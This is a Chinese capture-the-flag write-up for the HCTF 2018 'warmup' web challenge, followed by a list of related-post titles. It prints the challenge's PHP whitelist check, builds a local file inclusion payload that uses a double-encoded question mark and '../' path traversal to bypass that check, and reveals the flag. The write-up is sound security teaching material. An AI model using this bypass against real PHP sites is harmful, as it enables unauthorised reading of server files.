CTF warmup
难度系数: ★★
题目来源: HCTF
题目描述: 暂无
题目场景: http://220.249.52.133:38343 (温馨提示:每次进入URL的端口号都不一样)
1、点击链接进入如下界面
2、查看源代码(按F12或F12+Fn),出现以下代码。
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>Document</title>
</head>
<body><!--source.php--><br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>
3、发现了“source.php”
则在链接后面加上“/source.php”
既是http://220.249.52.133:38343/source.php
4、输入URL之后,跳出以下信息
<?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}
?>
5、发现了关键信息
$whitelist = [“source”=>“source.php”,“hint”=>“hint.php”];
6、在链接后加上/hint.php
URL: http://220.249.52.133:38343/hint.php
7、输入URL,出现以下信息
8、然后构造payload
?file=source.php%253f/../../../../ffffllllaaaagggg
URL: http://220.249.52.133:38343/source.php?file=source.php%253f/../../../../ffffllllaaaagggg
这样也可以,等等!
9、找到flag
10、OK
flag{25e7bce6005c4e0c983fb97297ac6e5a}
CTF warmup相关推荐
- CTF(pwn)攻防世界warmup
题目描述 这种题很有意思,只给了题目场景地址没有文件,让你盲打,类似于web中的盲注吧; nc连接,给了 目标地址, 思路是:利用栈溢出覆盖,返回这个地址; 具体是溢出多少是不确定的,是P64(),还 ...
- [原题复现]HCTF 2018 Warmup
HCTF 2018 Warmup 原题复现:https://gitee.com/xiaohua1998/hctf_2018_warmup 考察知识点:文件包含漏洞(phpmyadmin 4.8.1任意 ...
- CSAW CTF 2016 PWN quals-warmup
CSAW CTF 2016 PWN quals-warmup 原文链接 先对文件有个大致的了解,是64位ELF文件 ☁ csaw ctf 2016 quals-warmup ls exp.py fla ...
- 从0到1的CTF之旅————Web(1)
今天学习了一下web感觉受益匪浅,小做几道题练练手,纯新手勿喷 -------------------------------------------- 第一题:[极客大挑战 2019]EasySQL ...
- CTF之MISC练习二
一.base16解密 题目名称:base64÷4 题目附件: https://adworld.xctf.org.cn/media/task/attachments/c8cb2b557b57475d8e ...
- CTF密码学总结(二)
目录 CTF 密码学总结 题目类型总结: 简单密码类型: 复杂密码类型: 文件相关类型: 算法类总结: 密码学脚本类总结: 单独的密文类型(优先使用ciphey工具) 多层传统加密混合: Bugku的 ...
- CTF密码学部分知识总结(一)
目录 openssl 解密RSA一般步骤 1.凯撒密码(Caesar) 2.摩斯密码在线解密 3.unicode在线解码 4.栅栏密码在线解密 5.培根密码在线解密 6.python反编译工具unco ...
- CTF 中RSA的常见解析
0x01 前言 这里就不讨论数论的基础了,进行RSA的题目解答,至少要懂得基本的数论知识的,如果不了解数论的基本知识的话,网上相关内容还是挺多的. RSA基于一个简单的数论事实,两个大素数相乘十分容易 ...
- [ CTF ] WriteUp- 20221003 CTFShow新(脑洞)手(套路)杯
目录 [Misc]哇库哇库 [Misc]显卡坏了 赛后看官方wp给的脚本: [Web]easy_eval [Web]repairman [Crypto]easy_base [Crypto]天知地知(赛 ...
- [cryptoverse CTF 2023] crypto部分
没打,完事作作题. Warmup 1 Decode the following ciphertext: GmvfHt8Kvq16282R6ej3o4A9Pp6MsN. Remember: CyberC ...
最新文章
- 数据库期末复习之事务与数据恢复
- 【多标签文本分类】融合CNN-SAM与GAT的多标签文本分类模型
- SQL like 模糊查询
- 用Spring Cloud Alibaba开发微服务会更香吗?
- html中英文混排,EndNote中英文混排时et al和等的3种解决方法 | 科研动力
- 特斯拉:已在中国建立数据中心,以实现数据存储本地化
- postgresql10.5安装
- 如何成为一名大厂的优秀员工?
- javaweb和ajax使用查询出来的数据做下拉菜单_区块链浏览器实用指南篇:利用链上数据把握减半行情...
- UED、UCD、UE、UI、交互设计概念
- ORA-01476: divisor is equal to zero解决方法
- Discuz!X/数据库操作方法
- mysql年龄数据类型_MySql 数据类型
- 身份证前6位城市代码
- python绘制网络拓扑图_python 画网络拓扑图
- ArcMap下停靠栏的设计与实现
- JavaScript的全局作用域、全局对象window
- 研究生浑浑噩噩的一天
- 算法笔记——15个瓶子,4只老鼠,测试哪瓶有毒
- andt-pro:搭建一个ant-design-pro项目(模板)
热门文章
- 为什么「计件工资」的管理需要数字化?这家企业用实践解答
- iOS - 毛玻璃效果
- 散户通过a股量化数据接口实现自动化实盘交易主要方式有哪些?
- 计算机打字速度在线测试,在线测试打字速度(一分钟打字速度测试)
- 2018-08-14云兴维智电话面试总结
- 【操作系统】 2.2 调度概念以及调度算法
- 机器学习全系列经典书籍推荐
- oracle 创建cdb,Oracle 12C -- 手动创建CDB
- 设计一个高性能三维渲染服务器,最强大脑-CATIA飞机协同设计制造工作站配置方案2016...
- java 实现jpg、png、tif、gif 任意图像格式转换(多页tif合并)